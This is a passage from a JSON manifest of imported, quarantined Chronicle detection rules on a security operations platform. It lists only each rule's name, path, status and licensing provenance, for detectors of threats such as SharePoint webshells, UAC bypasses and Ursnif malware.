"detections/chronicle-imports/_quarantine/troldesh-ransomware-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "troldesh_ransomware_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/troldesh_ransomware_detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-ttp-sharepoint-cve-2025-49706-exploitation", "type": "detection", "name": "ttp_sharepoint_cve_2025_49706_exploitation", "description": "ttp_sharepoint_cve_2025_49706_exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ttp-sharepoint-cve-2025-49706-exploitation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ttp_sharepoint_cve_2025_49706_exploitation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/sharepoint/ttp_sharepoint_cve_2025_49706_exploitation.yaral" } }, { "id": "chronicle-detection-rules-ttp-windows-sharepoint-cve-2025-53770-webshell-attempted", "type": "detection", "name": "ttp_windows_sharepoint_cve_2025_53770_webshell_attempted", "description": "ttp_windows_sharepoint_cve_2025_53770_webshell_attempted", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ttp-windows-sharepoint-cve-2025-53770-webshell-attempted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ttp_windows_sharepoint_cve_2025_53770_webshell_attempted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/sharepoint/ttp_windows_sharepoint_cve_2025_53770_webshell_attempted.yaral" } }, { "id": "chronicle-detection-rules-ttp-windows-sharepoint-cve-2025-53770-webshell-succeeded", "type": "detection", "name": "ttp_windows_sharepoint_cve_2025_53770_webshell_succeeded", "description": "ttp_windows_sharepoint_cve_2025_53770_webshell_succeeded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ttp-windows-sharepoint-cve-2025-53770-webshell-succeeded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ttp_windows_sharepoint_cve_2025_53770_webshell_succeeded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/community/microsoft/sharepoint/ttp_windows_sharepoint_cve_2025_53770_webshell_succeeded.yaral" } }, { "id": "chronicle-detection-rules-ttp-windows-suspicious-filewrites-to-sharepoint-layouts", "type": "detection", "name": "ttp_windows_suspicious_filewrites_to_sharepoint_layouts", "description": "ttp_windows_suspicious_filewrites_to_sharepoint_layouts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ttp-windows-suspicious-filewrites-to-sharepoint-layouts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ttp_windows_suspicious_filewrites_to_sharepoint_layouts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/sharepoint/ttp_windows_suspicious_filewrites_to_sharepoint_layouts.yaral" } }, { "id": "chronicle-detection-rules-ttp-windows-w3wp-launching-encoded-powershell", "type": "detection", "name": "ttp_windows_w3wp_launching_encoded_powershell", "description": "ttp_windows_w3wp_launching_encoded_powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ttp-windows-w3wp-launching-encoded-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "chronicle/detection-rules", "source_id": "ttp_windows_w3wp_launching_encoded_powershell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/sharepoint/ttp_windows_w3wp_launching_encoded_powershell.yaral" } }, { "id": "chronicle-detection-rules-ttp-windows-webserver-process-potential-webshell-execution", "type": "detection", "name": "ttp_windows_webserver_process_potential_webshell_execution", "description": "ttp_windows_webserver_process_potential_webshell_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ttp-windows-webserver-process-potential-webshell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ttp_windows_webserver_process_potential_webshell_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/sharepoint/ttp_windows_webserver_process_potential_webshell_execution.yaral" } }, { "id": "chronicle-detection-rules-tunnel-rdp-out-port-443", "type": "detection", "name": "tunnel_rdp_out_port_443", "description": "tunnel_rdp_out_port_443", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": 
"imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/tunnel-rdp-out-port-443.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "tunnel_rdp_out_port_443", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/tunnel_rdp_out_port_443.yaral" } }, { "id": "chronicle-detection-rules-turla-backdoor-sysmon", "type": "detection", "name": "turla_backdoor_sysmon", "description": "turla_backdoor_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/turla-backdoor-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "turla_backdoor_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/turla_backdoor__sysmon.yaral" } }, { "id": "chronicle-detection-rules-turla-scheduled-task-and-host-fingerprinting-detector-sysmon-behavior", "type": "detection", "name": "turla_scheduled_task_and_host_fingerprinting_detector_sysmon_behavior", "description": "turla_scheduled_task_and_host_fingerprinting_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/turla-scheduled-task-and-host-fingerprinting-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "turla_scheduled_task_and_host_fingerprinting_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/turla_scheduled_task_and_host_fingerprinting_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-uac-bypass-via-event-viewer", "type": "detection", "name": "uac_bypass_via_event_viewer", "description": "uac_bypass_via_event_viewer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/uac-bypass-via-event-viewer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "uac_bypass_via_event_viewer", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/uac_bypass_via_event_viewer.yaral" } }, { "id": "chronicle-detection-rules-uac-bypass-via-sdclt", "type": "detection", "name": "uac_bypass_via_sdclt", 
"description": "uac_bypass_via_sdclt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/uac-bypass-via-sdclt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "uac_bypass_via_sdclt", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/uac_bypass_via_sdclt.yaral" } }, { "id": "chronicle-detection-rules-unauthenticated-file-read-in-cisco-asa-cisco-firepower-cve20203452-via-web", "type": "detection", "name": "unauthenticated_file_read_in_cisco_asa__cisco_firepower_cve20203452_via_web", "description": "unauthenticated_file_read_in_cisco_asa__cisco_firepower_cve20203452_via_web", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/unauthenticated-file-read-in-cisco-asa-cisco-firepower-cve20203452-via-web.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "unauthenticated_file_read_in_cisco_asa__cisco_firepower_cve20203452_via_web", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", 
"imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/webserver/unauthenticated_file_read_in_cisco_asa___cisco_firepower_cve_2020_3452__via_web.yaral" } }, { "id": "chronicle-detection-rules-underminer-exploit-kit-delivers-malware", "type": "detection", "name": "underminer_exploit_kit_delivers_malware", "description": "underminer_exploit_kit_delivers_malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/underminer-exploit-kit-delivers-malware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "underminer_exploit_kit_delivers_malware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/underminer_exploit_kit_delivers_malware.yaral" } }, { "id": "chronicle-detection-rules-unusual-searchprotocolhost-child-process-via-cmdline", "type": "detection", "name": "unusual_searchprotocolhost_child_process_via_cmdline", "description": "unusual_searchprotocolhost_child_process_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/unusual-searchprotocolhost-child-process-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "unusual_searchprotocolhost_child_process_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/unusual_searchprotocolhost_child_process__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-unusual-solarwinds-child-process-via-cmdline", "type": "detection", "name": "unusual_solarwinds_child_process_via_cmdline", "description": "unusual_solarwinds_child_process_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/unusual-solarwinds-child-process-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "unusual_solarwinds_child_process_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/unusual_solarwinds_child_process__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-unusual-solarwinds-file-creation-via-filewrite", "type": "detection", "name": "unusual_solarwinds_file_creation_via_filewrite", "description": "unusual_solarwinds_file_creation_via_filewrite", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/unusual-solarwinds-file-creation-via-filewrite.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "unusual_solarwinds_file_creation_via_filewrite", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/file_event/unusual_solarwinds_file_creation__via_filewrite.yaral" } }, { "id": "chronicle-detection-rules-ursnif", "type": "detection", "name": "ursnif", "description": "ursnif", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ursnif.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ursnif", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/ursnif.yaral" } }, { "id": "chronicle-detection-rules-ursnif-malware-detector-sysmon", "type": "detection", "name": "ursnif_malware_detector_sysmon", "description": "ursnif_malware_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ursnif-malware-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ursnif_malware_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/ursnif_malware_detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-ursnif-trojan-detection-cmd-obfuscation", "type": "detection", "name": "ursnif_trojan_detection_cmd_obfuscation", "description": "ursnif_trojan_detection_cmd_obfuscation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ursnif-trojan-detection-cmd-obfuscation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ursnif_trojan_detection_cmd_obfuscation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ursnif_trojan_detection__cmd_obfuscation.yaral" } }, { "id": "chronicle-detection-rules-usage-of-sysinternals-tools", "type": "detection", "name": "usage_of_sysinternals_tools", "description": "usage_of_sysinternals_tools", "version": 
"1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/usage-of-sysinternals-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "usage_of_sysinternals_tools", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/usage_of_sysinternals_tools.yaral" } }, { "id": "chronicle-detection-rules-usb-device-plugged", "type": "detection", "name": "usb_device_plugged", "description": "usb_device_plugged", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/usb-device-plugged.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "usb_device_plugged", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/usb_device_plugged.yaral" } }, { "id": "chronicle-detection-rules-usb-file-stealer-usbguard-detector-sysmon", "type": "detection", "name": "usb_file_stealer_usbguard_detector_sysmon", "description": 
"usb_file_stealer_usbguard_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/usb-file-stealer-usbguard-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "usb_file_stealer_usbguard_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/usb_file_stealer__usbguard__detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-using-bashexe-in-windows", "type": "detection", "name": "using_bashexe_in_windows", "description": "using_bashexe_in_windows", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/using-bashexe-in-windows.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "using_bashexe_in_windows", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/using_bash_exe_in_windows.yaral" } }, { "id": 
"chronicle-detection-rules-using-rasman-remote-access-connection-manager-windows-service-to-register-dll", "type": "detection", "name": "using_rasman_remote_access_connection_manager_windows_service_to_register_dll", "description": "using_rasman_remote_access_connection_manager_windows_service_to_register_dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/using-rasman-remote-access-connection-manager-windows-service-to-register-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "using_rasman_remote_access_connection_manager_windows_service_to_register_dll", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/using_rasman__remote_access_connection_manager__windows_service_to_register_dll.yaral" } }, { "id": "chronicle-detection-rules-vba-dll-loaded-via-microsoft-word", "type": "detection", "name": "vba_dll_loaded_via_microsoft_word", "description": "vba_dll_loaded_via_microsoft_word", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vba-dll-loaded-via-microsoft-word.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "chronicle/detection-rules", "source_id": "vba_dll_loaded_via_microsoft_word", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/vba_dll_loaded_via_microsoft_word.yaral" } }, { "id": "chronicle-detection-rules-vbsbased-malware-infection", "type": "detection", "name": "vbsbased_malware_infection", "description": "vbsbased_malware_infection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vbsbased-malware-infection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vbsbased_malware_infection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/vbs_based_malware_infection.yaral" } }, { "id": "chronicle-detection-rules-vermin-backdoor-detector-sysmon", "type": "detection", "name": "vermin_backdoor_detector_sysmon", "description": "vermin_backdoor_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vermin-backdoor-detector-sysmon.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vermin_backdoor_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/vermin_backdoor_detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-vt-relationships-file-contacts-domain", "type": "detection", "name": "vt_relationships_file_contacts_domain", "description": "vt_relationships_file_contacts_domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vt-relationships-file-contacts-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vt_relationships_file_contacts_domain", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/vt_relationships_file_contacts_domain.yaral" } }, { "id": "chronicle-detection-rules-vt-relationships-file-contacts-ip", "type": "detection", "name": "vt_relationships_file_contacts_ip", "description": "vt_relationships_file_contacts_ip", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/vt-relationships-file-contacts-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vt_relationships_file_contacts_ip", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/vt_relationships_file_contacts_ip.yaral" } }, { "id": "chronicle-detection-rules-vt-relationships-file-contacts-tor-ip", "type": "detection", "name": "vt_relationships_file_contacts_tor_ip", "description": "vt_relationships_file_contacts_tor_ip", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vt-relationships-file-contacts-tor-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vt_relationships_file_contacts_tor_ip", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/vt_relationships_file_contacts_tor_ip.yaral" } }, { "id": "chronicle-detection-rules-vt-relationships-file-downloaded-from-ip", "type": "detection", "name": "vt_relationships_file_downloaded_from_ip", "description": "vt_relationships_file_downloaded_from_ip", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, 
"playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vt-relationships-file-downloaded-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vt_relationships_file_downloaded_from_ip", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/vt_relationships_file_downloaded_from_ip.yaral" } }, { "id": "chronicle-detection-rules-vt-relationships-file-downloaded-from-url", "type": "detection", "name": "vt_relationships_file_downloaded_from_url", "description": "vt_relationships_file_downloaded_from_url", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 